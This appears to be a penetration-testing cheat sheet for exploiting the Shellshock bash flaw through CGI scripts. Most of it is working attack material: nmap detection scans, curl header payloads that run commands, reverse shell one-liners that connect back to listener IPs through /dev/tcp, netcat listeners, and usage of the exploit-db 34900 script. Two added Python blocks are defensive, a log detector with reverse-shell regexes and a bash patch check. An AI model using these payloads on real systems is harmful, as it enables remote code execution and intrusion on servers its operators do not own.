/cgi-bin Shellshock

# NMAP

```bash
# confirm the NSE script is installed (the script file is http-shellshock.nse, not "shellshock")
ls -lah /usr/share/nmap/scripts/ | grep -i shellshock

# http-shellshock takes a single uri= argument; repeating --script-args does not queue
# several URIs, so run the scan once per CGI path
sudo nmap 10.11.1.71 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi
sudo nmap 10.11.1.71 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```

# Curl PoC to check whether the target is vulnerable

```bash
# the echoed Content-Type header and blank lines give the CGI response a valid header block,
# so the output of id(1) comes back in the HTTP body
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.10.10/cgi-bin/test/test.cgi
```

# Variant

```bash
# the original line was missing the ';' before bash -c, which made "bash -c id" an argument to echo
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable"; bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
```

# Curl revshell (Kali $ip 10.10.10.10)

```bash
# the address after /dev/tcp/ is the listener (Kali) IP; this example uses 192.168.55.200
# rather than the 10.10.10.10 named in the heading
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.55.200/443 0>&1' http://192.168.55.87/cgi-bin/test/test.cgi
```

Listener on Kali (start it before sending the request):

```bash
nc -nvlp 443
```

# Variant (Kali 192.168.119.177)

```bash
# the aaaa/zzzz echo markers bracket the command output so sed prints only what ran between them
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >& /dev/tcp/192.168.119.177/443 0>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
```
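Every request above carries its payload in an HTTP header that the web server hands to the CGI script as an environment variable, which also means the same string lands in the server's access log. The following is an added example, not part of the original cheat sheet, showing how a defender picks those requests out of an Apache combined-format log or a live header set; the log lines, addresses and timestamps in it are constructed for the example.

```python
"""Spot Shellshock-style CGI requests in web logs and live request headers.

Added example for this page (not from the original cheat sheet). The
Apache "combined" LogFormat records User-Agent and Referer, so the
function-definition prefix used by the PoCs above is usually visible in
the access log. The sample lines below are constructed for this example.
"""
import re
from typing import Dict, List, Optional

# The bash function-definition prefix that CVE-2014-6271 keys on. Whitespace
# between "()" and "{" is tolerated, so "() { ignored; };" matches as well.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Secondary indicators that the payload opens a shell back to the sender
# rather than just running id(1).
REVSHELL_RE = re.compile(r"/dev/tcp/|bash\s+-i|\bnc\s+-e", re.IGNORECASE)

# Apache combined LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)

# Constructed sample log (IPs and timestamps are made up for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/test/test.cgi HTTP/1.1" 200 41 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"
10.0.0.9 - - [10/Oct/2014:13:56:07 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 500 612 "-" "() { :; }; /bin/bash -i >& /dev/tcp/10.0.0.9/443 0>&1"
10.0.0.12 - - [10/Oct/2014:13:57:40 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 88 "-" "curl/7.68.0"
"""


def classify_value(value: str) -> Optional[str]:
    """Return 'reverse-shell', 'probe' or None for a single header value."""
    if not SHELLSHOCK_RE.search(value):
        return None
    return "reverse-shell" if REVSHELL_RE.search(value) else "probe"


def inspect_headers(headers: Dict[str, str]) -> List[Dict[str, str]]:
    """Check every header of a live request (e.g. from a reverse-proxy hook),
    not only User-Agent: the CGI interface exports Referer, Cookie and
    custom headers as HTTP_* environment variables too."""
    findings = []
    for name, value in headers.items():
        kind = classify_value(value)
        if kind:
            findings.append({"header": name, "kind": kind, "value": value})
    return findings


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Report every request whose User-Agent or Referer carries a Shellshock pattern."""
    hits = []
    for line in text.splitlines():
        entry = parse_combined(line)
        if entry is None:
            continue  # not combined format or a truncated line; skip it
        for field in ("ua", "ref"):
            kind = classify_value(entry[field])
            if kind:
                parts = entry["req"].split()
                hits.append({
                    "ip": entry["ip"],
                    "path": parts[1] if len(parts) > 1 else entry["req"],
                    "status": entry["status"],
                    "field": field,
                    "kind": kind,
                })
                break  # one report per request line
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['kind']:13} {hit['path']} (HTTP {hit['status']}, via {hit['field']})")
```

The response status is reported alongside each hit because it tells the analyst whether the script answered normally (the PoC that emits its own Content-Type gets a 200) or choked on malformed CGI output; either way the pattern in the header is the signal, not the status.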

# Searchsploit

https://www.exploit-db.com/exploits/34900

[1] Copy the exploit locally:

```bash
sudo searchsploit -m linux/remote/34900.py
```

Examples:

```bash
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234
```

[2] Get a pseudo-shell (unstable):

```bash
./34900.py payload=reverse rhost=192.168.101.171 lhost=192.168.101.160 lport=1234 pages=/cgi-bin/test
```

Variant:

```bash
./exploit.py payload=reverse rhost=10.11.1.71 lhost=192.168.119.177 lport=443 pages=/cgi-bin/test.cgi,/cgi-bin/admin.cgi
```

[3] From the initial pseudo-shell, send another bash reverse shell back to Kali; make sure you select a different port (quad 4, i.e. 4444):

```bash
bash -i >& /dev/tcp/192.168.101.160/4444 0>&1
```

[4] Catch the connection back on Kali:

```bash
nc -nvlp 4444
```
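The defender's counterpart to the exploit script above is checking whether the hosts you own still import function definitions from the environment. The following is an added example, not part of the original page and not the exploit-db script, wrapping the vendor-published environment-variable test; it assumes a bash binary is on PATH and reports "patched" on any bash carrying the CVE-2014-6271 fix.

```python
"""Verify that the local bash is patched against CVE-2014-6271.

Added example for this page (not part of the original cheat sheet). It runs
the well-known environment-variable check: a function definition is exported
with a trailing command, and bash is started. An unpatched bash executes the
trailing command while importing the function and echoes the marker; a
patched bash ignores the variable (or imports only the function body).
Assumes bash is on PATH.
"""
import os
import shutil
import subprocess
from typing import Optional

MARKER = "shellshock-marker"


def bash_is_vulnerable() -> Optional[bool]:
    """True if bash ran the trailing command of an imported function,
    False if it is patched, None if no bash binary was found."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = dict(os.environ)
    # Function definition followed by a command in a plain exported variable;
    # a fixed bash never evaluates the part after the closing brace.
    env["x"] = "() { :; }; echo " + MARKER
    result = subprocess.run(
        [bash, "-c", "echo probe"],
        env=env, capture_output=True, text=True, timeout=10, check=False,
    )
    return MARKER in result.stdout


def report() -> str:
    """Human-readable verdict for a host inventory or compliance script."""
    state = bash_is_vulnerable()
    if state is None:
        return "bash not found; nothing to check"
    if state:
        return "VULNERABLE: this bash still executes code after an imported function definition"
    return "patched: function import does not execute trailing commands"


if __name__ == "__main__":
    print(report())
```

Run it on every host that exposes CGI scripts; a web server is only exposed if the interpreter behind the script (bash, or /bin/sh when it is bash) is unpatched, so this check is the one that actually closes the finding.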

# Fuzzing using gobuster

# Metasploit

# shocker
